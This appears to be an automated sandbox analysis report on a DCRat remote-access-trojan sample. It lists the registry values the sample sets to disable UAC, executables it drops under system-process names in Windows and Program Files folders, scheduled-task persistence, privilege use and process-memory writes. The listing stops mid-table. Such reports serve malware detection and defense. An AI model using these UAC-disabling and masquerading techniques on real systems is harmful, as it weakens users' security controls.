Malware Analysis Report

2024-11-13 13:42

Sample ID: 240516-cdckxsfd3w
Target: 78e93535702e2a553d85bac1d4737210_NeikiAnalytics
SHA256: b6d844ec087f7be57656bfb4782919dbe0cf823301b441e68b7a7a8e757049fb
Tags: rat dcrat evasion execution infostealer trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: b6d844ec087f7be57656bfb4782919dbe0cf823301b441e68b7a7a8e757049fb
Threat Level: Known bad

The file 78e93535702e2a553d85bac1d4737210_NeikiAnalytics was found to be: Known bad.

Malicious Activity Summary

Tags: rat dcrat evasion execution infostealer trojan

Dcrat family
Process spawned unexpected child process
DcRat
DCRat payload
UAC bypass
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks computer location settings
Checks whether UAC is enabled
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
System policy modification
Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-05-16 01:57

Signatures

DCRat payload

Tags: rat

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Dcrat family

Tags: dcrat

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-05-16 01:57
Reported: 2024-05-16 01:59
Platform: win7-20240220-en
Max time kernel: 148s
Max time network: 139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe"

Signatures

DcRat

Tags: rat infostealer dcrat

Process spawned unexpected child process

Description | Indicator | Process | Target | Count
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A | 54

UAC bypass

Tags: evasion trojan

Description | Indicator | Process | Target | Count
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A | 11
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A | 11
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A | 11
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A | 1
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A | 1
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A | 1

DCRat payload

Tags: rat

Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 14

Checks whether UAC is enabled

Tags: evasion trojan

Description | Indicator | Process | Target | Count
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A | 11
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A | 11
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A | 1
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A | 1

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\Uninstall Information\c5b4cb5e9653cc | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\lsass.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Portable Devices\RCX2273.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows NT\Accessories\en-US\sppsvc.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Windows Mail\ja-JP\spoolsv.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Program Files\Microsoft Games\Minesweeper\ja-JP\cc11b995f2a76d | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Windows Mail\ja-JP\f3b6ecef712a24 | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Windows NT\Accessories\en-US\sppsvc.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Windows NT\Accessories\en-US\0a1fd5f707cd16 | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Uninstall Information\RCX35DD.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows NT\Accessories\en-US\RCX3EC6.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Program Files\Microsoft Games\Minesweeper\ja-JP\winlogon.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Uninstall Information\services.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\RCX37E0.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Mail\ja-JP\spoolsv.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Windows Portable Devices\cc11b995f2a76d | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Uninstall Information\services.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\6203df4a6bafc7 | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Portable Devices\winlogon.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files\Microsoft Games\Minesweeper\ja-JP\RCX2B5C.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files\Microsoft Games\Minesweeper\ja-JP\winlogon.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Mail\ja-JP\RCX2D60.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Program Files (x86)\Windows Portable Devices\winlogon.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\lsass.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Offline Web Pages\spoolsv.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Windows\Offline Web Pages\f3b6ecef712a24 | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Windows\debug\WIA\sppsvc.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Windows\debug\WIA\0a1fd5f707cd16 | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Windows\Migration\WTR\lsass.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Windows\security\templates\csrss.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\Migration\WTR\RCX1E6B.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\Offline Web Pages\spoolsv.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\Media\Festival\sppsvc.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\L2Schemas\RCX4137.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Windows\Migration\WTR\6203df4a6bafc7 | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Windows\security\templates\886983d96e3d3e | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Windows\L2Schemas\explorer.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Windows\L2Schemas\7a0fd90576e088 | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\debug\WIA\sppsvc.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\Media\Festival\RCX33D9.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\debug\WIA\RCX28EB.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\L2Schemas\explorer.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Windows\Media\Festival\sppsvc.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File created | C:\Windows\Media\Festival\0a1fd5f707cd16 | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\Migration\WTR\lsass.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\Offline Web Pages\RCX206F.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\security\templates\RCX267A.tmp | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A
File opened for modification | C:\Windows\security\templates\csrss.exe | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

Tags: persistence

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A | 54

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A | 5
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 12
N/A | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A | 11

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1664 wrote to memory of 2540 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2540 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2540 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2076 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2076 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2076 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2644 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2644 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2644 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2080 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2080 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2080 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2104 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2104 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2104 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2224 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2224 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2224 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2096 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2096 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2096 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2088 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2088 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2088 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 324 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 324 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 324 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2492 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2492 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2492 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2444 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2444 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2444 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1664 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\cmd.exe |
| PID 1664 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\cmd.exe |
| PID 1664 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | C:\Windows\System32\cmd.exe |
| PID 2680 wrote to memory of 2196 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\w32tm.exe |
| PID 2680 wrote to memory of 2196 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\w32tm.exe |
| PID 2680 wrote to memory of 2196 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\w32tm.exe |
| PID 2680 wrote to memory of 2844 | N/A | C:\Windows\System32\cmd.exe | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe |
| PID 2680 wrote to memory of 2844 | N/A | C:\Windows\System32\cmd.exe | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe |
| PID 2680 wrote to memory of 2844 | N/A | C:\Windows\System32\cmd.exe | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe |
| PID 2844 wrote to memory of 2924 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 2844 wrote to memory of 2924 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 2844 wrote to memory of 2924 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 2844 wrote to memory of 2912 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 2844 wrote to memory of 2912 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 2844 wrote to memory of 2912 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 2924 wrote to memory of 1804 | N/A | C:\Windows\System32\WScript.exe | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe |
| PID 2924 wrote to memory of 1804 | N/A | C:\Windows\System32\WScript.exe | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe |
| PID 2924 wrote to memory of 1804 | N/A | C:\Windows\System32\WScript.exe | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe |
| PID 1804 wrote to memory of 2284 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 1804 wrote to memory of 2284 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 1804 wrote to memory of 2284 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 1804 wrote to memory of 2188 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 1804 wrote to memory of 2188 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 1804 wrote to memory of 2188 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |
| PID 2284 wrote to memory of 988 | N/A | C:\Windows\System32\WScript.exe | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe |
| PID 2284 wrote to memory of 988 | N/A | C:\Windows\System32\WScript.exe | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe |
